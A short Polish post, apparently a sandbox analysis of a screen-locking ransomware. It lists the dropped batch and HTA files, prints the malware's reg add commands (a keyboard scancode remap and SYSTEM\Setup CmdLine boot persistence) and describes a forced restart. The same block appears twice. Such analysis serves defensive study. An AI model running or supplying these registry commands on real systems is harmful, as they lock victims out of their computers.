19.11.2018, 22:55
Jakiś Ransom LockScreen
Dropped files
C:\setup.bat
C:\clear.bat
C:\payload.hta
C:\Users\admin\AppData\Local\Temp\RarSFX0\clear.bat
C:\Users\admin\AppData\Local\Temp\RarSFX0\payload.hta
C:\Users\admin\AppData\Local\Temp\RarSFX0\init.bat
C:\Users\admin\AppData\Local\Temp\RarSFX0\setup.bat
Rejestr:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000000040000003800450000003800000038E000000000 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v SetupType /t REG_DWORD /d 2 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v CmdLine /t REG_SZ /d "cmd.exe /C C:\setup.bat" /f
write:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout
HKEY_LOCAL_MACHINE\SYSTEM\Setup
Czynności: Dostęp do interfejsu com Kierunek: LocalSecurityAuthority.Shutdown co doprowadza do restartu CMD shutdown -r -t 35 -f i blokady ekranu.
Treść widoczna jedynie dla zarejestrowanych użytkowników
Dropped files
C:\setup.bat
C:\clear.bat
C:\payload.hta
C:\Users\admin\AppData\Local\Temp\RarSFX0\clear.bat
C:\Users\admin\AppData\Local\Temp\RarSFX0\payload.hta
C:\Users\admin\AppData\Local\Temp\RarSFX0\init.bat
C:\Users\admin\AppData\Local\Temp\RarSFX0\setup.bat
Rejestr:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000000040000003800450000003800000038E000000000 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v SetupType /t REG_DWORD /d 2 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v CmdLine /t REG_SZ /d "cmd.exe /C C:\setup.bat" /f
write:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout
HKEY_LOCAL_MACHINE\SYSTEM\Setup
Czynności: Dostęp do interfejsu com Kierunek: LocalSecurityAuthority.Shutdown co doprowadza do restartu CMD shutdown -r -t 35 -f i blokady ekranu.